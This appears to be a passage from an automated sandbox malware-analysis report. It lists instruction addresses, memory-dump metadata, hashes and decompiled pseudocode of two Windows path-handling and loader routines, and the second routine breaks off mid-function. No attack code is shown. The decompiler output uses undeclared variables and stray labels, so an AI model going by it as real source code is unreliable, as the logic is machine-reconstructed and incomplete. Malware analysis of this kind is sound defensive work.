0x052f5baa
0x052f5baf
0x052f5bb4
0x052f5bb6
0x052f5bbc
0x052f5bbe
0x052f5bc4
0x052f5bcd
0x052f5bd3
0x052f5bd6
0x052f5bdc
0x052f5be0
0x052f5be3
0x052f5beb
0x052f5bf2
0x052f5bf8
0x052f5bfe
0x052f5c04
0x052f5c0e
0x052f5c18
0x052f5c1f
0x052f5c25
0x052f5c2a
0x052f5c2c
0x052f5c32
0x052f5c3a
0x052f5c3f
0x052f5c42
0x052f5c48
0x052f5c5b
0x052f5c5b
0x052f5c2c
0x052f5cb7
0x052f5cb9
0x052f5cbf
0x052f5cc2
0x052f5cca
0x052f5ccb
0x052f5ccb
0x052f5cd1
0x052f5cd7
0x052f5cda
0x052f5ce1
0x052f5ce4
0x052f5ce7
0x052f5ced
0x052f5cf3
0x052f5cf9
0x052f5cff
0x052f5d08
0x052f5d0a
0x052f5d0e
0x052f5d10
0x00000000
0x00000000
0x052f5d16
0x052f5d1a
0x00000000
0x00000000
0x052f5d20
0x052f5d22
0x052f5d25
0x052f5d2f
0x052f5d2f
0x052f5d33
0x052f5d3d
0x052f5d49
0x052f5d4b
0x00000000
0x00000000
0x052f5d5a
0x052f5d5d
0x052f5d60
0x00000000
0x00000000
0x052f5d66
0x052f5d69
0x00000000
0x00000000
0x052f5d6f
0x052f5d6f
0x052f5d73
0x052f5d79
0x052f5d7f
0x052f5d86
0x052f5d95
0x052f5d98
0x052f5dba
0x052f5dcb
0x052f5dce
0x052f5dd3
0x052f5dd6
0x052f5dd8
0x052f5de6
0x052f5dec
0x052f5dee
0x052f5df1
0x052f5df3
0x052f635a
0x052f635a
0x00000000
0x052f635a
0x052f5dfe
0x052f5e02
0x052f5e05
0x052f5e07
0x052f5e10
0x052f5e13
0x052f5e1b
0x052f5e1c
0x052f5e21
0x052f5e22
0x052f5e23
0x052f5e25
0x052f5e2a
0x052f5e2c
0x052f5e2e
0x052f5e36
0x052f5e39
0x052f5e42
0x052f5e47
0x052f5e4d
0x052f5e54
0x052f5e54
0x052f5e54
0x052f5e2e
0x052f5e5c
0x052f5e5f
0x052f5e62
0x052f5e64
0x052f5e6b
0x052f5e70
0x052f5e7a
0x052f5e7a
0x052f5e7a
0x052f5e6b
0x052f5e7e
0x052f5e7f
0x052f5e7f
0x052f5e81
0x052f5e87
0x052f5e8b
0x052f5e8c
0x052f5e8c
0x052f5e8c
0x052f5e9a
0x052f5e9c
0x052f5ea2
0x052f5ea6
0x052f5f50
0x052f5f50
0x052f5f57
0x052f5f66
0x052f5f66
0x052f5f66
0x052f5f68
0x052f5f6a
0x052f63d0
0x00000000
0x052f5f70
0x052f5f70
0x052f5f91
0x052f5f9c
0x052f5f9e
0x052f5fa4
0x052f5fa6
0x052f638c
0x052f6392
0x052f63a1
0x052f63a7
0x052f63af
0x052f63af
0x052f63bd
0x052f63d8
0x00000000
0x052f63d8
0x052f5fac
0x052f5fb2
0x052f5fb4
0x052f5fbd
0x052f5fc6
0x052f5fce
0x052f5fd4
0x052f5fdc
0x052f5fec
0x052f5fed
0x052f5fee
0x052f5fef
0x052f5ff9
0x052f5ffa
0x052f5ffb
0x052f5ffc
0x052f6000
0x052f6004
0x052f6012
0x052f6012
0x052f6018
0x052f6019
0x052f601a
0x052f601b
0x052f601c
0x052f6020
0x052f6059
0x052f605c
0x052f6061
0x052f6061
0x052f6022
0x052f6022
0x052f6022
0x052f6025
0x052f602a
0x052f602b
0x052f6031
0x052f6037
0x052f6038
0x052f603e
0x052f6048
0x052f6049
0x052f604a
0x052f604b
0x052f604c
0x052f604d
0x052f6053
0x052f6054
0x052f6054
0x052f6062
0x052f6065
0x052f6067
0x052f606a
0x052f6070
0x052f6075
0x052f6076
0x052f6081
0x052f6087
0x052f6095
0x052f6099
0x052f609e
0x052f60a4
0x052f60ae
0x052f60b0
0x052f60b3
0x052f60b6
0x052f60b8
0x052f60ba
0x052f60ba
0x052f60ba
0x052f60ba
0x052f60be
0x052f60c0
0x052f60c5
0x052f60c5
0x052f60c5
0x052f60c6
0x052f60cd
0x052f6114
0x052f60cf
0x052f60cf
0x052f60d4
0x052f60d5
0x052f60da
0x052f60db
0x052f60e1
0x052f60e2
0x052f60e8
0x052f60f8
0x052f60fd
0x052f60fe
0x052f6102
0x052f6104
0x052f6107
0x052f6109
0x052f610b
0x052f610b
0x052f610b
0x052f610b
0x052f610f
0x052f610f
0x052f6117
0x052f611a
0x052f611f
0x052f6125
0x052f6134
0x052f6139
0x052f613f
0x052f6146
0x052f6148
0x052f614b
0x052f614d
0x052f614f
0x052f614f
0x052f614f
0x052f614f
0x052f6153
0x052f6159
0x052f6159
0x052f615c
0x052f6163
0x052f6169
0x052f616c
0x052f6172
0x052f6181
0x052f6186
0x052f6187
0x052f618b
0x052f6191
0x052f6195
0x052f61a3
0x052f61bb
0x052f61c0
0x052f61c3
0x052f61cc
0x052f61d0
0x052f61dc
0x052f61de
0x052f61e1
0x052f61e4
0x052f61e6
0x052f61e8
0x052f61e8
0x052f61e8
0x052f61e8
0x052f61e6
0x052f61ec
0x052f61f3
0x052f6203
0x052f6209
0x052f620a
0x052f6216
0x052f621d
0x052f6227
0x052f6241
0x052f6246
0x052f624c
0x052f6257
0x052f6259
0x052f625c
0x052f625e
0x052f6260
0x052f6260
0x052f6260
0x052f6260
0x052f625e
0x052f6264
0x052f6267
0x052f6269
0x052f6315
0x052f6315
0x052f631b
0x052f631e
0x052f6324
0x052f6327
0x052f632f
0x052f6330
0x052f6333
0x052f633a
0x052f633c
0x052f6335
0x052f6335
0x052f6335
0x052f633f
0x052f6342
0x052f634c
0x052f6352
0x052f6355
0x052f6355
0x052f6359
0x00000000
0x052f626f
0x052f6275
0x052f6275
0x052f6278
0x052f627e
0x052f627e
0x052f6281
0x052f6287
0x052f628d
0x052f6298
0x052f629c
0x052f62a2
0x052f629e
0x052f629e
0x052f629e
0x052f62a7
0x052f62a7
0x052f62aa
0x052f62b0
0x052f62f0
0x052f62f0
0x052f62f2
0x052f62f8
0x052f62fd
0x052f62b2
0x052f62b2
0x052f62b2
0x052f62b5
0x052f62dd
0x052f62e2
0x052f62e5
0x052f62b7
0x052f62b8
0x052f62bb
0x052f62bd
0x052f62c0
0x052f62c4
0x052f62cd
0x052f62cd
0x052f62c0
0x052f62bb
0x052f62b5
0x052f6302
0x052f6303
0x052f6305
0x052f6305
0x052f6305
0x052f630c
0x052f630c
0x00000000
0x052f627e
0x052f6269
0x052f5eac
0x052f5ebb
0x052f5ebe
0x052f5ecb
0x052f5ecb
0x052f5ece
0x052f5ece
0x052f5ed4
0x052f5ed7
0x052f5ed9
0x052f5edb
0x052f5edb
0x052f5ee1
0x052f5ee1
0x052f5ee3
0x052f5f20
0x052f5f20
0x052f5ee5
0x052f5ee5
0x052f5ee5
0x052f5ee8
0x052f5f11
0x052f5f18
0x052f5eea
0x052f5eea
0x052f5eed
0x052f5ef2
0x052f5ef8
0x052f5efb
0x052f5f0a
0x052f5f0a
0x052f5eed
0x052f5ee8
0x052f5f22
0x052f5f28
0x00000000
0x00000000
0x052f5f30
0x052f5f31
0x052f5f37
0x052f5f3a
0x052f5f3d
0x052f5f44
0x00000000
0x00000000
0x00000000
0x052f5f46
0x052f5f48
0x052f5f4d
0x00000000
0x052f5f4d
0x052f5dda
0x052f5ddf
0x00000000
0x052f5ddf
0x052f5dd8
0x052f5da7
0x052f5da9
0x052f5dac
0x052f5dae
0x00000000
0x052f5db4
0x052f5db4
0x00000000
0x052f5db4
0x052f5dae
0x052f5d88
0x052f5d8d
0x052f6363
0x052f6369
0x052f636a
0x052f6370
0x052f6372
0x052f637a
0x052f637b
0x052f637d
0x00000000
0x00000000
0x052f637f
0x052f6385
0x00000000
0x052f6385
0x052f5d38
0x052f5d3b
0x00000000
0x00000000
0x00000000
0x052f5d3b
0x052f5d27
0x052f5d29
0x00000000
0x00000000
0x00000000
0x052f6360
0x00000000
0x052f6360
0x052f5c10
0x052f5c10
0x052f63da
0x052f63e5
0x052f63e5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f926d02af30f9b6493194aee45e58f921ba5ec2797892a4bd28e2b9198235f3
Instruction ID: 160520f6f58b6027dbc9da498ff9fbac661cc003ffa0866a49e25d776b258f39
Opcode Fuzzy Hash: 8f926d02af30f9b6493194aee45e58f921ba5ec2797892a4bd28e2b9198235f3
Instruction Fuzzy Hash: 03425971A2422ACFDB24CF68D880BA9F7B1FF45704F1481AAD94DAB342D774A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05244120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E05244120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x531d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0525F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E05246E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L05244620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E05246E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M052445F8))) {
												case 0:
													_v568 = 0x5201078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x52011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L05244620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0526F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0526F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E052252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0523EB70(1, 0x53179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0523AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E052695D0();
																			L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0526B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05263D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0526B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x05244128
0x05244135
0x0524413c
0x05244141
0x05244145
0x05244147
0x0524414e
0x05244151
0x05244159
0x0524415c
0x05244160
0x05244164
0x05244168
0x0524416c
0x0524417f
0x05244181
0x0524446a
0x0524446a
0x0524418c
0x05244195
0x05244199
0x05244432
0x05244439
0x0524443d
0x05244442
0x05244447
0x00000000
0x0524419f
0x052441a3
0x052441b1
0x052441b9
0x052441bd
0x052445db
0x052445db
0x00000000
0x052441c3
0x052441c3
0x052441ce
0x052441d4
0x0528e138
0x0528e13e
0x0528e169
0x0528e16d
0x0528e19e
0x0528e16f
0x0528e16f
0x0528e175
0x0528e179
0x0528e18f
0x0528e193
0x00000000
0x0528e199
0x00000000
0x0528e199
0x0528e193
0x00000000
0x00000000
0x00000000
0x052441da
0x052441da
0x052441df
0x052441e4
0x052441ec
0x05244203
0x05244207
0x0528e1fd
0x05244222
0x05244226
0x0528e1f3
0x0528e1f3
0x0524422c
0x0524422c
0x05244233
0x0528e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05244239
0x05244239
0x05244239
0x05244239
0x05244233
0x05244226
0x052441ee
0x052441ee
0x052441f4
0x05244575
0x0528e1b1
0x0528e1b1
0x00000000
0x0524457b
0x0524457b
0x05244582
0x0528e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x05244588
0x05244588
0x0524458c
0x0528e1c4
0x0528e1c4
0x00000000
0x05244592
0x05244592
0x05244599
0x0528e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0524459f
0x0524459f
0x052445a3
0x0528e1d7
0x0528e1e4
0x00000000
0x052445a9
0x052445a9
0x052445b0
0x0528e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x052445b6
0x052445b6
0x052445b6
0x00000000
0x052445b6
0x052445b0
0x052445a3
0x05244599
0x0524458c
0x05244582
0x00000000
0x00000000
0x00000000
0x00000000
0x052441f4
0x0524423e
0x05244241
0x052445c0
0x052445c4
0x00000000
0x052445ca
0x052445ca
0x00000000
0x0528e207
0x0528e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x052445d1
0x00000000
0x00000000
0x052445ca
0x00000000
0x05244247
0x05244247
0x05244247
0x05244249
0x05244249
0x05244249
0x05244251
0x05244251
0x05244257
0x0524425f
0x0524426e
0x05244270
0x0524427a
0x0528e219
0x0528e219
0x05244280
0x05244282
0x05244456
0x052445ea
0x00000000
0x052445f0
0x0528e223
0x00000000
0x0528e223
0x0524445c
0x0524445c
0x00000000
0x0524445c
0x00000000
0x05244288
0x0524428c
0x0528e298
0x05244292
0x05244292
0x0524429e
0x052442a3
0x052442a7
0x052442ac
0x0528e22d
0x052442b2
0x052442b2
0x052442b9
0x052442bc
0x052442c2
0x052442ca
0x052442cd
0x052442cd
0x052442d4
0x0524433f
0x0524433f
0x052442d6
0x052442d6
0x052442d9
0x052442dd
0x052442eb
0x0528e23a
0x052442f1
0x05244305
0x0524430d
0x05244315
0x05244318
0x0524431f
0x05244322
0x0524432e
0x0524433b
0x0524433b
0x00000000
0x0524432e
0x052442eb
0x0524434c
0x0524434e
0x05244352
0x05244359
0x0524435e
0x05244361
0x0524436e
0x0524438a
0x0524438e
0x05244396
0x0524439e
0x052443a1
0x052443ad
0x052443bb
0x052443bb
0x052443ad
0x0524436e
0x052443bf
0x052443c5
0x05244463
0x05244463
0x052443ce
0x052443d5
0x052443d9
0x052443df
0x05244475
0x05244479
0x05244491
0x05244491
0x05244479
0x052443e5
0x052443eb
0x052443f4
0x052443f6
0x052443f9
0x052443fc
0x052443ff
0x052444e8
0x052444ed
0x052444f3
0x0528e247
0x00000000
0x052444f9
0x05244504
0x05244508
0x0524450f
0x0528e269
0x00000000
0x05244515
0x05244519
0x05244531
0x05244534
0x05244537
0x0524453e
0x05244541
0x0524454a
0x0528e255
0x0528e255
0x0528e25b
0x0528e25e
0x0528e261
0x0528e261
0x05244555
0x05244559
0x0524455d
0x0528e26d
0x0528e270
0x0528e274
0x0528e27a
0x0528e27d
0x0528e28e
0x0528e28e
0x05244563
0x05244563
0x05244569
0x05244569
0x00000000
0x0524455d
0x0524450f
0x00000000
0x052444f3
0x052443ff
0x05244405
0x05244405
0x05244405
0x052442ac
0x0524428c
0x05244282
0x05244407
0x0524440d
0x0528e2af
0x0528e2af
0x05244413
0x05244413
0x00000000
0x052441d4
0x00000000
0x052441c3
0x052441bd
0x05244415
0x05244415
0x05244416
0x05244417
0x05244429
0x0524416e
0x0524416e
0x05244175
0x05244498
0x0524449f
0x0528e12d
0x00000000
0x0528e133
0x00000000
0x0528e133
0x052444a5
0x052444a5
0x052444aa
0x00000000
0x052444bb
0x052444ca
0x052444d6
0x052444d7
0x052444d8
0x052444e3
0x052444e3
0x052444aa
0x0524417b
0x0524417b
0x0524417b
0x00000000
0x0524417b
0x05244175
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfdf0c7e0da80bc9921efe15b51938c0a2c43e129ce497f087c1d53be193490
Instruction ID: b4ce30eff7d04ecff8aa6c784918d739a8b1e198c63cbede0721cdbfb968c415
Opcode Fuzzy Hash: 1dfdf0c7e0da80bc9921efe15b51938c0a2c43e129ce497f087c1d53be193490
Instruction Fuzzy Hash: 52F183706282518BCB18EF54C484B3AB7E6FF88714F15492EF48ACB290E774D995CF92

Uniqueness

Uniqueness Score: -1.00%

Function 052520A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E052520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x5318714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E05252EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E05252EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E052258EC(_t240);
									_t221 =  *0x5315cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x5315cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05264A2C(0x5316e40, 0x5264b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
